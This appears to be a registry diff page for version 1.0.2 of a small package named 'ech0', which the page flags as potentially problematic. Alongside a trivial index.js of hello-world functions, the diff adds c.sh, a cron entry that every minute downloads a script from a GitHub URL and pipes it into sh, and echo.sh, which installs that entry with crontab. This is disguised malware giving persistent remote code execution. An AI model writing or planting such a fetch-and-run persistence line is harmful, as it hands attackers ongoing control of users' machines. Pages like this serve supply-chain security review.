ech0 1.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ech0 might be problematic. Click here for more details.
- package/c.sh +1 -0
- package/echo.sh +1 -0
- package/index.js +17 -0
- package/package.json +12 -0
package/c.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
* * * * * curl https://github.com/foyoh/update/blob/main/1.sh | sh
|
package/echo.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
crontab c.sh
|
package/index.js
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
function helloWorld () {
|
2
|
+
console.log('Hello World!');
|
3
|
+
}
|
4
|
+
|
5
|
+
function doSomethingAwesome () {
|
6
|
+
console.log('Doing something awesome...');
|
7
|
+
}
|
8
|
+
|
9
|
+
function doSomethingElse () {
|
10
|
+
console.log('Now something else...');
|
11
|
+
}
|
12
|
+
|
13
|
+
module.exports = {
|
14
|
+
helloWorld: helloWorld,
|
15
|
+
doSomethingAwesome: doSomethingAwesome,
|
16
|
+
doSomethingElse: doSomethingElse
|
17
|
+
}
|
package/package.json
ADDED